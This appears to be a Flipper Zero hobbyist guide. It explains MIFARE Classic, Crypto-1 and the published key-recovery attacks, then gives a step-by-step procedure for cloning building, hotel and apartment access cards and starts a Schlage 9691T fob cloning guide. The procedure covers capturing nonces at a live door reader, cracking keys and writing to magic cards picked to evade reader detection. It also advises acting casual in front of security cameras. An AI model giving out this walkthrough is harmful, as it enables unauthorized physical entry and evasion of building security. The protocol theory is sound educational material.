Write to "magic" NFC cards (Gen1a, Gen2, Gen4) with writable sector 0 and UID. Essential for cloning MIFARE Classic to physical cards.

Intermediate🐬🐬🐬🐬🐬

🎯 Mifare Nested

Nested authentication attack for MIFARE Classic. Recovers sector keys when you already have at least one valid key.

Advanced🐬🐬🐬🐬

🎲 Mifare Fuzzer

Emulates MIFARE Classic cards with random UIDs to test how readers react. Useful for probing access control systems.

Advanced🐬🐬🐬

📝 MIFARE Classic Editor

View and edit raw sector data in saved .nfc files. Hex editor for individual sectors and blocks.

Advanced🐬🐬🐬

🏷️ NFC Maker

Create NFC tag content: Bluetooth MAC, contacts, URLs, emails, phone numbers, text, WiFi credentials. Write to blank NTAG cards.

Beginner🐬🐬🐬

🎮 Amiibo Toolkit

Read, save, and emulate Nintendo Amiibo figures. Write Amiibo data to blank NTAG215 cards to create physical Amiibos.

Beginner🐬🐬🐬🐬

🤖 Cyborg Detector

Generates a continuous NFC field to make NFC body implant LEDs glow. Tested on Dangerous Things xSIID implants.

Beginner🐬🐬🐬🐬🐬

📄 NFC Eink

Write images and text to NFC-powered e-ink displays. Supports Waveshare and similar NFC e-paper screens.

Intermediate🐬🐬🐬

🔑 NFC Login

Store login credentials and auto-type them via NFC tap. Tap the Flipper to your phone/computer to paste saved passwords.

Beginner🐬🐬

🃏 SaFlip

Multi-purpose NFC card utility. View card details, manage saved cards, and perform various NFC operations.

Intermediate🐬🐬

🔬 How NFC Cards Actually Work — The Crypto Behind the Clone

⚡ What's Physically Happening

Theory🐬🐬🐬🐬

▼

Here's the first mind-blowing fact about your NFC access card: it has no battery. Zero. None. That thin piece of plastic has a tiny silicon chip and a coil of copper wire inside — and that's it. So how does it work?

🔋 Power From Thin Air (Literally)

When you hold your card near a reader, here's the physics happening in real-time:

Energy Transfer & Communication

📡READER

💳CARD

The reader generates a radio field — It pumps out a 13.56 MHz electromagnetic wave from its antenna coil. This is happening constantly, even when no card is nearby. Think of it like a microwave oven, but way less power and at a specific frequency.
Your card enters the field — The card's copper coil antenna intercepts this radio wave. Through electromagnetic induction (same principle as wireless phone chargers), the oscillating magnetic field induces a voltage in the card's coil.
The chip wakes up — That induced voltage powers the card's tiny chip. It goes from dead silicon to a functioning computer in microseconds. The chip has just enough power (~2-5mA) to run its simple processor and memory.
They start talking — Communication is half-duplex (walkie-talkie style — one talks, the other listens). The reader sends commands by modulating the electromagnetic field. The card responds by load modulation — it switches a resistor on and off, which changes how much energy it draws from the field, and the reader can detect these tiny fluctuations.

Range

MIFARE Classic operates at 1–4 cm. That's not a design flaw — it's a security feature. The closer you need to be, the harder it is for someone to eavesdrop. (Though with a big enough antenna, researchers have demonstrated reads at 25+ cm in lab conditions.)

▶ Even Deeper: The Antenna Math

The card's coil antenna is tuned to resonate at 13.56 MHz. This frequency was chosen because it's in the ISM (Industrial, Scientific, Medical) band — no license needed. The coil typically has 3-5 turns and is etched into the card's PVC layers.

Power transfer follows the inverse-cube law: P ∝ 1/d³. At 1cm you get decent power. At 5cm, you've lost ~99% of it. At 10cm, it's essentially zero for a passive card. That's why you have to basically touch the reader.

The data rate is 106 kbit/s (for MIFARE Classic) using modified Miller encoding for reader→card and Manchester encoding for card→reader. At this speed, a full authentication + block read takes about 5ms.

🤝 The Authentication Dance (Challenge-Response)

Theory🐬🐬🐬🐬

▼

When a reader wants to access data on a MIFARE Classic card, they can't just ask. They have to prove they know the secret key. And the card has to prove the same thing back. This is called mutual authentication — a carefully choreographed dance where both sides verify each other without ever saying the password out loud.

Think of it like two spies meeting in a park. Neither one says the code word directly. Instead, they exchange riddles that can only be solved if you know the code word. If the answers match — they trust each other.

🎭 The 3-Pass Authentication Protocol

📡 Reader: "I want to read Sector 5 using Key A"

The reader sends an AUTH command specifying which sector it wants to access and which key (A or B) it's going to use. This is sent in plaintext — nothing secret here. It's just saying "I'm about to prove I belong."

🔑 Like walking up to a locked door and saying "I want to come in through the front entrance."

💳 Card: "Okay, prove it. Solve this." (sends nonce nT)

The card generates a 32-bit random number called a nonce (Number used ONCE). This is the tag nonce (nT). The card sends it to the reader as a challenge. The idea: only someone who knows the secret key can correctly respond to this random challenge.

🎲 Like rolling a pair of dice and saying "If you really know the password, tell me what these dice plus the password equal."

📡 Reader: "Here's my proof — and a challenge back at you"

The reader takes the card's nonce (nT), feeds it through the Crypto-1 cipher along with the shared secret key, and computes the correct response. But it also generates its own random nonce (nR) and sends that too — challenging the card back. The entire message is encrypted: {nR, f(nT)}.

🔐 Like answering the riddle AND asking your own riddle back — in code that only the real keyholder can create.

💳 Card: Verifies... then responds

The card checks if the reader's answer to its challenge is correct. If it is — the reader genuinely knows the key. The card then solves the reader's challenge and sends back {f(nR)}. If the answer was wrong? The card goes completely silent. No error message, no retry — just radio silence.

🤐 Like a spy who just walks away without a word if you get the code phrase wrong. No second chances.

🔒 Encrypted Channel Open

Both sides now have synchronized Crypto-1 cipher streams. Every subsequent command and response is encrypted. The reader can now read blocks, write data, or perform value operations — all protected by the session key derived from this exchange.

🔗 Like establishing a private language that only lasts for this conversation. Next time, new dice, new riddles, new language.

📊 The Full Exchange — Visual

MIFARE Classic 3-Pass Authentication Sequence

📡 Reader

💳 Card

AUTH sector=5, keyType=A

nT (32-bit card nonce)

{nR ∥ f(nT)} encrypted

{f(nR)} encrypted

═══ 🔒 ENCRYPTED CHANNEL ESTABLISHED ═══

READ block 20

[16 bytes encrypted data]

Critical Detail

This entire authentication dance happens in about 5 milliseconds. From the moment you tap your card to the moment the door clicks open — the card powers up, authenticates, sends the credential data, and the reader makes its decision — all faster than a single blink of your eye.

▶ Even Deeper: Why "Mutual" Authentication Matters

The authentication is mutual — both the reader AND the card prove they know the key. This was designed to prevent a rogue reader from extracting data from your card. If a fake reader can't prove it knows the key, the card stays silent.

In practice, this protection is weakened by the Crypto-1 vulnerabilities. A rogue reader can perform the authentication dance, collect the nonces, and then crack the key offline. But the principle of mutual auth is sound — modern cards like DESFire EV3 use the same concept with much stronger ciphers (AES-128).

💀 What Is Crypto-1 (And Why It's Broken)

Theory🐬🐬🐬🐬

▼

Crypto-1 is the encryption algorithm that protects every MIFARE Classic card on the planet. It was designed by NXP Semiconductors in the late 1990s, and it was kept proprietary — they never published how it worked, hoping that secrecy would equal security. They were wrong.

🔐 The Basics

Type: Stream cipher (generates a stream of pseudo-random bits, XORs them with the data)
Key length: 48 bits (6 bytes). The default key FFFFFFFFFFFF is literally all 1s.
Core mechanism: A 48-bit Linear Feedback Shift Register (LFSR)
Design era: Late 1990s, when 48-bit was considered "good enough" for a contactless card

⚙️ How the LFSR Works

Imagine a row of 48 boxes, each containing either a 0 or a 1. That's the LFSR — the heart of Crypto-1. The secret key is the initial state of these 48 boxes.

48-Bit LFSR — The Heart of Crypto-1

↰ ⊕ Feedback: XOR of tapped positions → feeds back to start ↲

Each clock cycle, the bits shift one position. Some positions are "tapped" — their values are XORed together and fed back into the beginning of the register. This generates a pseudo-random bitstream used to encrypt the communication. The output also passes through a nonlinear filter function to make it harder to reverse.

💣 Why It's Broken — The Fatal Flaws

48-bit key space is tiny. 2⁴⁸ = ~281 trillion possible keys. Sounds like a lot? A modern GPU can try billions of keys per second. Pure brute force would take hours, not centuries. But the actual attacks are much faster than brute force.
Security through obscurity failed. NXP kept Crypto-1 secret for a decade. In 2008, researchers at Radboud University Nijmegen physically reverse-engineered the chip — literally grinding down the silicon layer by layer under a microscope and reconstructing the circuit. They published the full algorithm.
The LFSR has algebraic weaknesses. Because the cipher is linear at its core, knowing some output bits lets you set up a system of equations and solve for the key. The nonlinear filter helps, but not enough against modern algebraic attacks.
The PRNG is predictable. The card's "random" nonce generator is based on a simple counter seeded at power-up. Since the card powers up at the same state each time, the nonces are predictable — this enables the nested attack.

Bottom Line

Crypto-1 was broken in 2008. It's now 2026 and there are still billions of MIFARE Classic cards in use worldwide. The technology is fundamentally compromised, but replacing global infrastructure takes decades. Every card you tap at a building or transit gate is likely using a cipher that a hobbyist with a $200 Flipper can defeat.

▶ Even Deeper: The 2008 Papers That Changed Everything

"Dismantling MIFARE Classic" — Garcia, de Koning Gans, et al. (2008). This paper detailed the reverse-engineering of Crypto-1 and presented practical attacks that could recover keys in seconds. NXP tried to get a court injunction to prevent publication. They lost. The judge ruled that academic freedom and public security outweighed corporate secrecy.

"A Practical Attack on the MIFARE Classic" — de Koning Gans, Hoepman, Garcia (2008). Presented the nested authentication attack — if you know one key, you can derive all others on the card in under a minute.

These papers didn't just break one product — they demonstrated why security through obscurity is a failed strategy. If your security depends on nobody understanding how it works, it's only a matter of time.

⚔️ How the Attacks Work

Theory🐬🐬🐬🐬

▼

Now you understand the authentication protocol and why Crypto-1 is weak. Here's how the Flipper Zero (and other tools) actually exploit those weaknesses to recover the secret keys.

📖

Dictionary Attack

The simplest attack. The Flipper has a built-in list of ~2000+ known keys — default factory keys, common vendor keys, keys found in the wild. It tries each one against each sector. If the card responds to authentication, that key is valid.

🔑 Like trying every key on a massive keyring until one fits the lock. Boring but effective — and shockingly many systems use default keys.

EasyOn-Device

🧮

MFKey32 Attack

This is the Flipper's killer feature. In "Detect Reader" mode, the Flipper pretends to be your card. When the real reader tries to authenticate, it unknowingly reveals encrypted nonces. The Flipper captures these nonce pairs, and the MFKey32 app mathematically solves for the sector key.

🕵️ Like recording someone dial a combination lock twice — from the sounds alone, a mathematician can figure out the combination.

MediumOn-Device

🪆

Nested Attack

If you know one valid key (say Key A for Sector 0), you can exploit the card's weak random number generator. During nested authentication, the card reuses predictable nonce patterns. By authenticating to the known sector first, then attempting another sector, you can correlate timing and nonce values to derive the unknown key.

🧩 Like knowing one combination to a multi-lock safe — the mechanisms are connected, so jiggling the one you know reveals vibrations that help you crack the next.

MediumNeeds 1 Key

🔨

Hardnested Attack

Some newer MIFARE Classic cards improved their PRNG to generate less predictable nonces. The standard nested attack fails. Hardnested collects thousands of nonce pairs and uses statistical analysis + brute force on the remaining key space. It's slower (needs a computer, not just the Flipper) but works against every MIFARE Classic card.

🔬 Like cracking a lock by X-raying it thousands of times from different angles — eventually you see enough of the internal structure to figure out every pin position.

HardComputer Required

🎯 How They Chain Together

In practice, you almost always use multiple attacks in sequence:

The Key Recovery Pipeline

📖Dictionary
Try known keys

→

🧮MFKey32
Emulate & capture

→

🪆Nested
Derive from known

→

🔨Hardnested
Statistical brute

→

✅Full Dump
All keys recovered

Most cards fall at step 1 or 2. You'd only need hardnested for particularly stubborn systems — and even then, it's a matter of when, not if.

▶ Even Deeper: The Math Behind MFKey32

The MFKey32 attack exploits the fact that the Crypto-1 LFSR is linear. When you capture two authentication sessions with the same key, you get two pairs of (nonce, encrypted_response). Each pair constrains the possible LFSR states.

Mathematically: the 48-bit key determines the initial LFSR state. Each nonce + response pair eliminates ~16 bits of entropy. Two pairs leave ~16 bits of uncertainty — meaning only ~65,536 possible keys to try. At millions of tries per second, that's cracked in milliseconds.

The name "MFKey32" refers to the 32-bit nonces used in the attack. Some implementations use MFKey64 (capturing full 64-bit encrypted exchanges) for even more reliable recovery.

🗺️ What's Actually On the Card (Memory Layout)

Theory🐬🐬🐬🐬

▼

A MIFARE Classic 1K card has exactly 1,024 bytes of memory. That's it — less than a single text file. But those 1,024 bytes are organized in a very specific way, and understanding the layout is key to knowing what you're reading and cloning.

📦 The Memory Map

MIFARE Classic 1K — Complete Memory Map (16 Sectors × 4 Blocks × 16 Bytes)

Sector 0 ★ SPECIAL

Block 0

UID (4 bytes) BCC SAK ATQA Manufacturer Data ← Factory-locked (unless Magic card)

Block 1

Data (16 bytes)

Block 2

Data (16 bytes)

Block 3

Key A (6 bytes) Access Bits (4 bytes) Key B (6 bytes) ← Sector Trailer

Sector 1

Block 4

Data (16 bytes)

Block 5

Data (16 bytes)

Block 6

Data (16 bytes)

Block 7

Key A (6 bytes) Access Bits (4 bytes) Key B (6 bytes)

Sectors 2–14 (same layout as Sector 1)

⋮ each sector: 3 data blocks + 1 sector trailer ⋮

Sector 15 (Last Sector)

Block 60

Data (16 bytes)

Block 61

Data (16 bytes)

Block 62

Data (16 bytes)

Block 63

Key A (6 bytes) Access Bits (4 bytes) Key B (6 bytes)

🏷️ Legend

UID — Unique Identifier Data — Your credentials Key A — Read/write key Key B — Alternate key Access Bits — Permissions Manufacturer — Factory info

🔍 Key Details

Block 0 is sacred. It contains the card's UID, BCC (Block Check Character — a checksum), SAK (Select Acknowledge), and manufacturer data. On a normal MIFARE Classic card, this block is permanently read-only, burned at the factory. This is why "magic" cards exist — they let you rewrite Block 0.
Sector trailers are the vault doors. The last block of every sector (blocks 3, 7, 11... 63) stores Key A, Access Bits, and Key B. Key A is NEVER readable — even with the correct key, reading it returns all zeros. Key B may be readable depending on the access bits configuration.
Access bits are the permissions matrix. They control what each key can do for each block in the sector: read, write, increment, decrement, or restore. Three bytes encode all the permissions, plus one byte of padding. Mess these up and you can permanently lock yourself out of a sector.

Watch Out

If you write incorrect access bits to a sector trailer, that sector becomes permanently inaccessible — even with both keys. On a normal card, this is irreversible. On a magic card, you can usually recover by rewriting Block 0 and the sector trailers using the backdoor command. Always back up before writing!

▶ Even Deeper: Access Bits Encoding

The 3 access bytes encode permissions for all 4 blocks of a sector using a clever (but confusing) bit scheme. Each block has 3 control bits (C1, C2, C3). These 12 bits (4 blocks × 3 bits) are stored twice — once normally and once inverted — for error detection.

Common configurations:

FF 07 80 — Transport configuration. Key A reads/writes everything. Key B is readable (useless as a secret key).
78 77 88 — Key A reads data, Key B writes data. Neither key can change the sector trailer without both. More secure.
08 77 8F — Maximum lockdown. Key A can read. Key B can write. Sector trailer locked. Used in payment systems.

If you're ever editing access bits manually, use an online MIFARE Classic Access Bits Calculator — calculating them by hand is error-prone and the consequence of a mistake is permanent sector lockout.

✨ Why "Magic" Cards Exist

Theory🐬🐬🐬🐬

▼

Here's the problem: to make a perfect clone, you need to copy everything — including the UID in Block 0. But on a real MIFARE Classic card, Block 0 is burned in at the factory and can never be changed. So how do you clone the UID?

Enter "magic" cards — specially manufactured MIFARE Classic compatible cards where Block 0 is writable. They're made by Chinese manufacturers specifically for cloning, testing, and security research.

📊 The Magic Card Lineup

Gen1a

"Chinese Magic Card"

Backdoor command unlocks Block 0
All sectors writable
Cheapest option ($1-3 each)
⚠️ Detectable — responds to the magic backdoor command
Works with 90% of readers

Gen2 (CUID)

"Changeable UID"

Block 0 writable via normal write commands
No special backdoor needed
Harder to detect than Gen1a
Slightly more expensive ($2-5 each)
⚠️ Some readers detect the writable Block 0

Gen4 (Ultimate)

"The Swiss Army Knife"

4-byte or 7-byte UID (switchable!)
Shadow mode — hides writable nature
Configurable backdoor (can be disabled)
Most expensive ($5-10 each)
Virtually undetectable in shadow mode

Decision Tree

4-byte UID + basic reader? → Gen1a (cheapest, works fine)
Reader detects Gen1a? → Gen2 (no backdoor to detect)
7-byte UID or paranoid reader? → Gen4 (handles everything)

⏱️ Why Emulation Sometimes Fails

Theory🐬🐬🐬🐬

▼

You've cloned the card perfectly to your Flipper. All sectors read. All keys recovered. You tap it on the reader and... nothing. Why?

⚡ It's a Speed Problem

The Flipper Zero's NFC emulation is done in software — its ARM Cortex-M4 processor is interpreting commands and generating responses. A real MIFARE Classic chip does this in dedicated hardware (hardwired silicon circuits). The difference:

Response Time Comparison

MIFARE Chip:

~1μs

Flipper Zero:

~50-200μs

Reader timeout:

~5ms (strict) — ~20ms (lenient)

Most readers have lenient timing and the Flipper is fast enough. But some readers — especially newer ones or high-security installations — have very tight timing windows. If the Flipper's software emulation takes even a fraction too long, the reader times out and rejects the card.

🃏 Why Physical Magic Cards Always Work

A physical magic card contains actual MIFARE Classic silicon — the same dedicated hardware as the original card. It processes Crypto-1 authentication at hardware speed, meets every timing requirement, and is electrically indistinguishable from a genuine card. That's why the recommended workflow is:

The Recommended Workflow

📖Read original card with Flipper

→

🔓Crack keys (dictionary + mfkey32)

→

📝Write to magic card

→

✅Use physical card at reader

🤔 Other Reasons Emulation Can Fail

UID length mismatch: Some readers expect a 7-byte UID but the Flipper might be emulating 4 bytes (or vice versa).
Anti-collision issues: The Flipper's NFC stack handles the ISO 14443 anti-collision protocol slightly differently than real silicon. Some readers are picky about the exact byte timing during this phase.
Multi-sector authentication: If the reader authenticates to multiple sectors in rapid succession, the Flipper's CPU may not keep up with the Crypto-1 state for each session.
Physical coupling: The Flipper's antenna is smaller and differently positioned than a standard card. Holding it at the wrong angle or distance can cause weak coupling and communication errors.

Pro Tip

If emulation fails: write to a magic card first. It costs $2-3 for a Gen1a card and eliminates timing issues entirely. Keep the Flipper emulation for convenience (tapping into buildings you enter frequently), but have a physical backup for stubborn readers.

🔓 MIFARE Classic Cloning — Complete Guide

📋 Step-by-Step: Clone a MIFARE Classic Card

Intermediate🐬🐬🐬🐬🐬

▼

This is the most requested Flipper Zero guide, and for good reason — MIFARE Classic cards are everywhere. They're used in apartment buildings, office buildings, hotels, gyms, universities, transit systems, parking garages, and more. If you have a white card or plastic fob that you tap to get into a building, there's a very good chance it's MIFARE Classic. Here's how to make a perfect, working clone.

🧠 Background: How MIFARE Classic Works

Before you start, understanding a few concepts will save you a LOT of frustration:

Sectors & Blocks: A MIFARE Classic 1K card has 16 sectors, each containing 4 blocks of 16 bytes. A 4K card has 40 sectors. The data you care about (your access credentials) lives in these sectors.
Keys: Each sector is locked by two keys — Key A and Key B. That's 32 keys total for a 1K card (16 sectors × 2 keys). You need these keys to read the data inside each sector.
Crypto-1 Encryption: MIFARE Classic uses an encryption scheme called Crypto-1. It was cracked back in 2008 and is fundamentally broken, which is why we can recover the keys. Every MIFARE Classic card in the world is vulnerable to this — it's not a Flipper hack, it's a protocol weakness.
UID (Unique Identifier): Every card has a 4-byte or 7-byte UID burned into Block 0, Sector 0. Many access systems check the UID as part of authentication. To make a real clone, you need to copy this UID too — which requires a special "magic" card.

🛒 What You Need

Item	Required?	Cost	Notes
Flipper Zero + Momentum	Yes	—	The Momentum firmware includes MFKey, Mifare Nested, and NFC Magic apps pre-installed
Original MIFARE Classic card/fob	Yes	—	The card you want to clone
Physical access to a reader	Usually	—	The door lock or turnstile reader — needed for the mfkey32 attack (Step 2). Not needed if the card uses all default keys.
Magic NFC card (Gen1a/Gen2/Gen4)	Optional	$2–10	Only needed if you want a physical card clone instead of using Flipper emulation. See card types below.

🃏 Magic Card Types Explained

If you want a physical card (not just Flipper emulation), you need a "magic" card — a special MIFARE Classic card that allows writing to Block 0 (where the UID lives). Regular MIFARE Classic cards have Block 0 locked at the factory.

Type	UID Length	Price	Pros	Cons
Gen1a (Magic)	4-byte	$1–3	Cheapest, widely available, Flipper writes directly	Detectable by some readers (they send a "magic wakeup" command and Gen1a responds — real cards don't)
Gen2 (CUID)	4-byte	$3–5	Not detectable by Gen1a checks, writes via standard commands	Slightly more expensive, some can only be written once
Gen4 (Ultimate Magic)	4 or 7-byte	$5–10	Supports both UID lengths, undetectable, can configure advanced features	Most expensive, configuration can be complex

Which One Should I Buy?

Start with Gen1a — they're cheapest and work with most systems. If the reader rejects it (some high-security systems detect Gen1a cards), step up to Gen2. If your original card has a 7-byte UID, you need Gen4. Search Amazon for "UID changeable MIFARE Classic 1K" or "CUID MIFARE Classic" — a pack of 5 costs $5-15.

📖 The Complete Cloning Process

Step 1: Initial Read (Dictionary Attack) — ⏱️ 1-5 minutes

This is your first attempt. The Flipper tries a large list of known default keys against every sector. Many cards ship with default keys (like FFFFFFFFFFFF or A0A1A2A3A4A5) and some building managers never change them all.

Navigate to NFC → Read — From the Flipper main menu, press the center button to open the menu. Scroll down to NFC (it has a phone icon 📱). Press center to enter. Select Read.

Place the card on the back of the Flipper — The NFC antenna is in the center of the Flipper's back (not the top, not the bottom — dead center). Place the card flat against the back of the Flipper, centered. Hold steady.

Wait for detection — The Flipper will show "Reading..." and detect the card type. You'll see something like: MIFARE Classic 1K and the UID (e.g., UID: AB CD EF 12). Then the dictionary attack begins automatically.

Watch the progress — The screen shows: Found keys: X/32 and Sectors read: Y/16. This runs through hundreds of known keys. Let it finish completely — do NOT pull the card away or press back. It takes 1-5 minutes.

What you'll see when it finishes:

32/32 keys found, 16/16 sectors read — 🎉 You got lucky! The card uses all default keys. Skip straight to Step 6 (Save).
Some keys found (e.g., 8/32, 4/16) — Partial success. You have some keys but not all. Continue to Step 2.
0/32 keys, 0/16 sectors — The card uses no default keys at all. That's fine — continue to Step 2. This is normal for well-configured systems.

What's Actually Happening

The Flipper has a built-in dictionary of ~1700+ known MIFARE Classic keys. During this step, it tries every key in the dictionary against every sector. If a key works for a sector, it reads all the data in that sector. Momentum firmware includes an expanded dictionary with more keys than stock firmware.

Step 2: Extract MF Keys — Capture Reader Nonces — ⏱️ 30 seconds – 3 minutes

This is the most important step and the one that makes MIFARE Classic cloning actually work. You need physical access to the card reader (the door lock, turnstile, or whatever device reads the card).

Navigate to NFC → Extract MF Keys — On older Momentum versions this might be called "Detect Reader". It's in the main NFC menu.

You'll be asked to select your partially-read card — Choose the card you just read in Step 1. If you didn't save it yet, you may need to read it first and save it, then come back to Extract MF Keys.

Walk to the door reader — Go to the actual reader device on the wall. This is the thing you normally tap your card against to open the door.

Hold the Flipper FLAT against the reader — Press the center of the Flipper's back directly against the reader. The NFC antenna needs to be as close as possible. Hold it steady. You'll see the Flipper screen update.

The reader will try to authenticate — The reader thinks the Flipper is a real card and attempts to verify it. During this exchange, the Flipper captures cryptographic nonces — the mathematical handshake data that leaks key information due to the Crypto-1 weakness.

Collect multiple nonces — Hold the Flipper against the reader for at least 5-10 seconds. The screen shows how many nonces have been collected. More is better. If the reader beeps, flashes a light, or even opens the door — that's all normal, don't panic. Try to collect at least 5 nonces before pulling away.

Press Back when done — The nonces are saved to the Flipper's SD card automatically. You can now walk away from the reader.

Troubleshooting Step 2:

"No nonces captured" — You're holding the Flipper too far from the reader, or at the wrong angle. Try pressing it flat and centered. Some readers have the antenna at the top, bottom, or a specific spot — experiment with position.
The reader opens the door — This actually means the reader uses UID-only authentication (it only checks the card's ID number, not the encrypted data). This is extremely insecure and means cloning is trivially easy — you may already have enough data from Step 1!
The reader doesn't react at all — The reader might be offline, might not be NFC (could be 125 kHz RFID), or might use a non-MIFARE protocol like DESFire. Make sure the original card actually works on this reader.
Only 1-2 nonces captured — Some readers only authenticate one sector. That's fine — you'll get keys for that sector, then repeat this step to collect nonces for other sectors in subsequent rounds.

⚠️ Don't Look Suspicious

Standing at a door reader holding a small electronic device for 30+ seconds can look suspicious to security cameras or passersby. This is your own building — you have every right to be there — but be aware of optics. Act casual. Pretend you're fiddling with your phone while holding the Flipper to the reader.

Step 3: Crack Keys with MFKey App — ⏱️ 30 seconds – 30 minutes

Now you turn those captured nonces into actual sector keys. The MFKey app does the heavy math.

Go to Main Menu → Applications → NFC → MFKey — On Momentum, this might also be accessible from the NFC menu directly. Navigate there and open it.

Press OK to start cracking — The app automatically finds the nonce data you captured in Step 2 and begins the mathematical key recovery process (called the mfkey32 attack).

Wait for it to finish — The screen shows progress as it crunches the numbers. You'll see something like Cracking sector 3... and then Found key: A0B1C2D3E4F5. This can take anywhere from 30 seconds to 30 minutes depending on how many nonces were captured and the complexity of the keys.

Check the results — When finished, it shows: Found X new keys. These keys are automatically added to your Flipper's key dictionary for future reads.

Troubleshooting Step 3:

"Found 0 new keys" — Not enough nonces were captured, or the nonces were corrupted (Flipper moved during capture). Go back to Step 2 and collect more nonces. Hold the Flipper more steady this time and collect for longer.
It's taking a very long time (>30 min) — This is unusual. The computation should be done in minutes. Check that the Flipper has enough battery and let it run.

What's Actually Happening

The mfkey32 attack exploits a fundamental weakness in Crypto-1: given two authentication exchanges with the same sector key, the key can be mathematically recovered. That's why the Flipper captures multiple nonce pairs — each pair gives it another chance to derive the key. Named after the paper "Dismantling MIFARE Classic" published in 2008.

Step 4: Read Again with New Keys — ⏱️ 1-5 minutes

Go back to NFC → Read — Same as Step 1.

Place the original card/fob on the Flipper again — Same position as before: centered on the back.

The dictionary attack runs again — But this time, your Flipper's dictionary now includes the keys cracked in Step 3, PLUS all the original default keys. You should see more sectors unlocking: Found keys: 18/32, Sectors read: 9/16 (higher numbers than Step 1).

Check: is it 32/32 keys and 16/16 sectors? — If YES: 🎉 All keys recovered! Skip to Step 6. If NO: repeat Steps 2-4. Each round typically recovers keys for a few more sectors.

How Many Rounds?

Expect 2-5 rounds of Extract MF Keys → MFKey → Read before you have all 32 keys. Each round usually unlocks a few more sectors. Some stubborn sectors may require the Nested Attack (Step 5). Don't give up after one round — this is an iterative process.

Step 5: Nested Attack (If Needed) — ⏱️ 1-10 minutes

If you have at least one valid key but can't get the rest through mfkey32, the Nested Attack is your next weapon. It exploits another Crypto-1 weakness: if you know one key, you can mathematically derive the others.

Navigate to Apps → NFC → Mifare Nested — This is a separate app from MFKey.

Select your partially-read card file — It needs the card data with at least one known key.

Place the original card on the Flipper — The Nested Attack needs to communicate with the live card (not just the saved data), because it performs cryptographic operations against the card's chip in real-time.

Let it run — The app uses your known key(s) to perform nested authentication attacks against unknown sectors. It may take 1-10 minutes depending on how many sectors remain.

Read the card one more time — Go to NFC → Read again. With the newly recovered keys, all 32 keys and 16 sectors should now be fully readable.

Step 6: Save the Full Dump — ⏱️ 10 seconds

After a complete read, the Flipper prompts you to save — Press the center button to save.

Name it something descriptive — Use the on-screen keyboard to type a name like Office_Badge or Gym_Card. Avoid spaces — use underscores.

File is saved — The complete card dump (all sectors, all keys, UID) is saved to /ext/nfc/YourName.nfc on the SD card. This file contains everything needed to emulate or clone the card.

Step 7: Emulate — ⏱️ Instant

Navigate to NFC → Saved — Browse to find your saved card.

Select the card → Emulate — The Flipper now pretends to BE this card. The screen shows "Emulating..." with the card name.

Hold the Flipper's CENTER against the reader — Not the top, not the bottom — the NFC antenna is in the dead center. Try holding it flat and flush. If the reader doesn't respond, try slight angle adjustments.

Troubleshooting Emulation:

Door opens — ✅ Perfect clone! You're done.
Reader flashes red / beeps angrily / nothing happens — The reader might be too fast for Flipper's emulation (some readers have strict timing requirements). Try repositioning. If it consistently fails, you need a physical magic card (Step 8).
Works sometimes but not always — Position and angle matter enormously. Practice finding the sweet spot. Some readers have their antenna at a specific location (top, bottom, or center of the pad).

Why Emulation Sometimes Fails

Flipper Zero's NFC chip (ST25R3916) emulates MIFARE Classic well, but some readers have very tight timing windows or perform additional checks that Flipper can't satisfy at software emulation speeds. Physical magic cards use actual MIFARE Classic silicon and always respond at hardware speed — they have a higher success rate on picky readers.

Step 8: Write to Magic Card (If Emulation Fails) — ⏱️ 30 seconds

Get a Magic Card — Buy a UID-changeable MIFARE Classic 1K card. Check your saved .nfc file — if the UID is 4 bytes (like AB CD EF 12), a Gen1a or Gen2 card works. If it's 7 bytes (like 04 AB CD EF 12 34 56), you need a Gen4 card.

Navigate to NFC → Saved → [your card] → Write — Select the Write option from the card's menu.

Place the blank magic card on the Flipper — Center of the back, same as reading. The Flipper writes ALL sector data PLUS the UID to the magic card.

Wait for "Write Success" — Takes about 5-15 seconds. The magic card is now an exact clone of the original.

Test the card on the reader — It should work identically to the original.

Troubleshooting Physical Clone:

"Write failed" — The card might not be a real magic card (some cheap cards are mislabeled), or it's the wrong type (Gen1a when you need Gen2). Try a different card from the pack.
Card written successfully but reader rejects it — If you used Gen1a, some readers perform a Gen1a detection test (they send a special "magic wakeup" command that only Gen1a cards respond to). Try a Gen2 or Gen4 card instead.
Card was working but stopped — The building may have updated their system, or the original card was deactivated. The clone mirrors the original — if the original stops working, the clone will too.

Pro Tip

If MFKey doesn't crack all keys after multiple rounds, try the Mifare Nested attack — it uses one known key to derive others. Between dictionary attack + mfkey32 + nested, you can crack virtually any MIFARE Classic card in existence.

Important

Some modern readers use anti-cloning features: UID randomization, sector-based authentication chains, or upgraded to DESFire. This guide works for standard MIFARE Classic systems, which are still the vast majority of access control installations worldwide. If the reader uses DESFire EV1/EV2/EV3, SEOS, or iCLASS SE — different approach needed (and much harder).

🔐 Complete Schlage 9691T Cloning Guide

🏠 Schlage 9691T — Everything You Need to Know

Advanced🐬🐬🐬🐬🐬

▼

📊 Difficulty: Intermediate-Advanced | ⏱️ Total Time: 30 min – 2 hours | 💰 Cost: $0–15

This guide covers every single step to clone a Schlage 9691T dual-frequency fob using a Flipper Zero with Momentum firmware. It's written for someone who has never done this before. If you follow every step in order, you will have a working clone.

📋 What is the Schlage 9691T?

The Schlage 9691T is a small key fob — about the size of a guitar pick — commonly given to apartment residents in buildings with Schlage access control systems. What makes it special (and interesting for us) is that it contains two completely separate chips operating at different radio frequencies:

Chip	Frequency	Technology	What It Opens	Cloning Difficulty
🔵 Low-Frequency Chip	125 kHz	HID ProxCard II compatible (or EM4100)	Building front door, parking garage, gates, elevators, common areas	Easy — no encryption, read & copy in seconds
🟠 High-Frequency Chip	13.56 MHz	MIFARE Classic 1K (Crypto-1)	Apartment door (Schlage deadbolt lock)	Advanced — encrypted, requires key cracking (but it IS crackable)

Important: The number printed on the back of the fob (something like 6A13183702-001313) is just the factory serial number. It is NOT the card data, NOT the access code, and NOT useful for cloning. The "9691T" label on the front identifies the fob model. The actual access data is stored digitally inside the chips and can only be read with a device like the Flipper.

🛒 Shopping List — What You Need Before Starting

Item	Have It?	Where to Buy	Cost	Notes
Flipper Zero + Momentum firmware	✅ Yes	—	—	Must have Momentum (or Xtreme/RogueMaster) for MFKey + Nested apps
Your Schlage 9691T fob	✅ Yes	—	—	The original fob you want to clone
T5577 blank cards	✅ Yes	—	—	For cloning the 125 kHz (building entrance) side
UID-changeable MIFARE Classic 1K cards	❌ Need	Amazon: search "UID changeable MIFARE Classic 1K NFC card" or "CUID MIFARE Classic 1K" or "Magic Gen1a MIFARE card"	$3–10 for a pack	For cloning the 13.56 MHz (apartment door) side. Buy 2-3 cards in case one fails.
